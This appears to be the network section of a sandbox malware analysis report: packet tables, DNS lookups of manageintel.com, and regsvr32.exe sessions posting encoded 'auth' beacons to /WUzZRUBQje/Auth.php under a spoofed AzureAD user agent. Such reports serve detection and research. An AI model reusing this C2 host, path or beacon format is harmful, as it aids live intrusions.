Jan 30, 2022 13:43:46.618947983 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.619020939 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.619131088 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.619198084 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.625515938 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.650769949 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.650890112 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.650963068 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.651005030 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.651032925 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.651093006 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.651102066 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.651128054 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.651174068 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.651213884 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.651276112 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.651355982 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.651458025 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.651535034 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.651655912 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.651729107 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.651803017 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.651878119 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.651995897 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.652071953 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.652178049 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.652251005 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.652350903 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.652424097 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.652529955 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.652602911 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.652710915 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.652790070 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.652888060 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.652962923 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.653076887 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.653170109 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.653213978 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.653286934 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.653409958 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.653577089 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.653640032 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.653743029 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.653887033 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.653983116 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.654078960 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.654161930 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.654259920 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.654345036 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.654501915 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.654587984 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.654711962 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.654902935 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.654936075 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.654993057 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.655009985 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.655054092 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.655102015 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.655180931 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.655292034 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.655380011 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.655482054 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.655561924 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.655658960 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.655741930 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.655850887 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.655937910 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.656007051 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.656085014 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.656253099 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.656333923 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.656440973 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.656517982 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.656605005 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.656675100 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.687525034 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.687542915 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.687654018 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.688060999 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.688144922 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.688266993 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.688353062 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.688458920 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.688553095 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.688654900 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.688745022 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.688894033 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.688978910 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.689075947 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.689224005 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.689316988 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.689419031 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.689615011 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.689776897 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.689856052 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.689876080 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.689891100 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.690031052 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.690078974 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.690124035 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.690190077 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.690196991 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.690237999 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.690320969 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.690444946 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.690565109 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.690633059 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.690717936 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.690817118 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.690905094 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.691039085 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.691119909 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.691216946 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.691298008 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.691446066 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.691536903 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.691622972 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.691714048 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.691723108 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.691827059 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.691931009 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.692038059 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.692123890 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.692219973 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.692317009 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.692420006 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.692528009 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.692706108 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.692783117 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.692837954 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.692917109 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.693016052 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.693085909 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.693203926 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.693279982 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.693406105 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.693478107 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.693598986 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.693682909 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.693783998 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.693886995 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.725549936 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.725600004 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.725770950 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.725814104 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.725846052 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.725893021 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.725915909 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.725929022 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.725936890 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.726036072 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.726047993 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.726058960 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.726066113 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.726129055 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.726156950 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.726552010 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.726644993 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.726986885 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.727080107 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.727412939 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.727498055 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.727829933 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.727904081 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.728250027 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.728332043 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.728668928 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.728759050 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.729096889 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.729180098 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.729579926 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.729659081 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.730077982 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.730165958 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.730230093 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.730285883 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.730295897 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.730339050 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.730381966 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:46.730439901 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.818042994 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:46.949474096 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:47.537750006 CET	49838	443	192.168.2.3	93.93.131.124
Jan 30, 2022 13:43:47.537803888 CET	443	49838	93.93.131.124	192.168.2.3
Jan 30, 2022 13:43:47.575268984 CET	49839	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:47.599066019 CET	32710	49839	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:47.599241018 CET	49839	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:47.599551916 CET	49839	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:47.674042940 CET	32710	49839	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:47.856467009 CET	32710	49839	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:47.856520891 CET	32710	49839	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:47.856712103 CET	49839	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:47.856765985 CET	49839	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:47.880434036 CET	32710	49839	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:47.884576082 CET	49840	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:47.908231020 CET	32710	49840	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:47.909262896 CET	49840	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:47.909421921 CET	49840	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:47.974422932 CET	32710	49840	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:48.152194977 CET	32710	49840	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:48.152381897 CET	49840	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:48.152431965 CET	49840	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:48.176052094 CET	32710	49840	185.14.31.158	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 30, 2022 13:43:15.264192104 CET	60982	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:43:15.368690014 CET	53	60982	8.8.8.8	192.168.2.3
Jan 30, 2022 13:43:45.536451101 CET	64367	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:43:45.643013954 CET	53	64367	8.8.8.8	192.168.2.3
Jan 30, 2022 13:43:46.010204077 CET	51539	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:43:46.030085087 CET	53	51539	8.8.8.8	192.168.2.3
Jan 30, 2022 13:43:47.554577112 CET	55393	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:43:47.573749065 CET	53	55393	8.8.8.8	192.168.2.3
Jan 30, 2022 13:43:47.865457058 CET	50585	53	192.168.2.3	8.8.8.8
Jan 30, 2022 13:43:47.882119894 CET	53	50585	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 30, 2022 13:43:15.264192104 CET	192.168.2.3	8.8.8.8	0x2c5a	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:43:45.536451101 CET	192.168.2.3	8.8.8.8	0xe795	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:43:46.010204077 CET	192.168.2.3	8.8.8.8	0x8f92	Standard query (0)	the.earth.li	A (IP address)	IN (0x0001)
Jan 30, 2022 13:43:47.554577112 CET	192.168.2.3	8.8.8.8	0x336c	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)
Jan 30, 2022 13:43:47.865457058 CET	192.168.2.3	8.8.8.8	0x8e63	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 30, 2022 13:43:15.368690014 CET	8.8.8.8	192.168.2.3	0x2c5a	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:43:45.643013954 CET	8.8.8.8	192.168.2.3	0xe795	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:43:46.030085087 CET	8.8.8.8	192.168.2.3	0x8f92	No error (0)	the.earth.li	93.93.131.124	A (IP address)	IN (0x0001)
Jan 30, 2022 13:43:47.573749065 CET	8.8.8.8	192.168.2.3	0x336c	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)
Jan 30, 2022 13:43:47.882119894 CET	8.8.8.8	192.168.2.3	0x8e63	No error (0)	manageintel.com	185.14.31.158	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

manageintel.com

the.earth.li

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49831	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49833	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49837	93.93.131.124	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49838	93.93.131.124	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49846	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49835	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:43:45.701220989 CET	11167	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 549 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4a 64 54 41 35 63 43 39 79 56 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 57 57 6e 42 4d 4d 6c 70 74 63 53 74 6e 50 54 30 69 4c 43 4a 55 51 55 31 6d 62 53 49 36 57 79 4a 58 53 58 52 36 4b 7a 55 72 61 7a 56 57 61 79 74 4c 64 7a 30 39 49 6c 30 73 49 6d 4e 43 52 69 49 36 49 6c 5a 77 64 32 38 78 64 6e 5a 51 4f 54 4a 6f 55 6c 46 6f 64 32 46 6c 65 6d 70 6b 5a 45 68 7a 50 53 49 73 49 6d 55 77 4d 32 56 6b 49 6a 6f 69 56 55 39 57 57 6e 67 32 59 55 30 77 56 56 56 4d 51 31 68 61 61 30 31 42 4b 32 35 6d 62 57 64 50 65 55 74 6e 4e 47 56 68 4f 56 68 55 54 6b 4a 4f 55 32 56 4d 56 45 4e 6d 57 54 30 69 4c 43 4a 6d 4d 57 52 68 49 6a 6f 69 56 44 52 4f 51 6a 46 61 65 58 41 30 56 31 56 7a 56 6e 67 77 52 32 5a 35 61 6b 68 43 5a 7a 51 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 4c 43 4a 36 61 30 4d 33 49 6a 6f 69 49 6e 30 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJJdTA5cC9yViIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJWWnBMMlptcStnPT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0=
Jan 30, 2022 13:43:45.976969957 CET	11168	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:43:48 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 260 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 57 48 4a 77 62 7a 4e 4c 51 30 51 77 56 7a 52 52 52 6d 31 6b 56 30 6c 43 54 46 46 55 56 55 31 5a 63 31 70 46 62 6c 56 4c 5a 45 5a 59 64 57 4e 48 53 47 63 39 50 53 49 73 49 6d 35 59 4f 48 6b 69 4f 69 4a 6a 59 6d 73 7a 4f 58 45 7a 55 7a 42 43 61 46 4a 54 4d 47 64 46 53 30 5a 49 52 55 4a 52 4d 45 77 77 57 6c 6f 30 53 31 41 30 53 6c 63 31 62 31 6c 54 59 53 74 51 55 32 5a 4d 54 6a 4e 72 55 6c 51 69 4c 43 4a 79 53 6e 46 56 49 6a 6f 69 5a 54 5a 30 65 44 52 4d 65 6c 6c 74 5a 31 56 4a 52 57 73 34 57 6b 78 43 4d 6b 4e 53 56 6d 4e 58 61 30 6f 78 62 46 6c 79 64 45 52 55 63 30 31 4c 52 54 59 7a 59 6c 68 31 54 30 74 75 51 57 64 6b 62 6c 64 32 61 54 64 56 52 48 52 54 62 32 56 6a 5a 53 74 68 4f 56 4a 7a 52 6b 30 33 4d 6e 70 76 56 6c 64 31 59 53 4a 39 Data Ascii: eyJoc3pBIjoiWHJwbzNLQ0QwVzRRRm1kV0lCTFFUVU1Zc1pFblVLZEZYdWNHSGc9PSIsIm5YOHkiOiJjYmszOXEzUzBCaFJTMGdFS0ZIRUJRMEwwWlo0S1A0Slc1b1lTYStQU2ZMTjNrUlQiLCJySnFVIjoiZTZ0eDRMelltZ1VJRWs4WkxCMkNSVmNXa0oxbFlydERUc01LRTYzYlh1T0tuQWdkbld2aTdVRHRTb2VjZSthOVJzRk03MnpvVld1YSJ9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49839	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:43:47.599551916 CET	12444	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 301 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 4a 72 4d 7a 6c 78 4d 31 4d 77 51 6d 68 53 55 7a 42 6e 52 55 74 47 53 45 56 43 55 54 42 4d 4d 46 70 61 4e 45 74 51 4e 45 70 58 4e 57 39 5a 55 32 45 72 55 46 4e 6d 54 45 34 7a 61 31 4a 55 49 69 77 69 59 30 4a 47 49 6a 6f 69 56 6e 42 33 62 7a 46 32 64 6c 41 35 4d 6d 68 53 55 57 68 33 59 57 56 36 61 6d 52 6b 53 48 4d 39 49 69 77 69 5a 54 41 7a 5a 57 51 69 4f 69 4a 56 54 31 5a 61 65 44 5a 68 54 54 42 56 56 55 78 44 57 46 70 72 54 55 45 72 62 6d 5a 74 5a 30 39 35 53 32 63 30 5a 57 45 35 57 46 52 4f 51 6b 35 54 5a 55 78 55 51 32 5a 5a 50 53 49 73 49 6e 52 69 5a 58 4e 78 62 69 49 36 49 6c 4a 4c 56 6e 49 77 55 54 30 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 66 51 3d 3d Data Ascii: 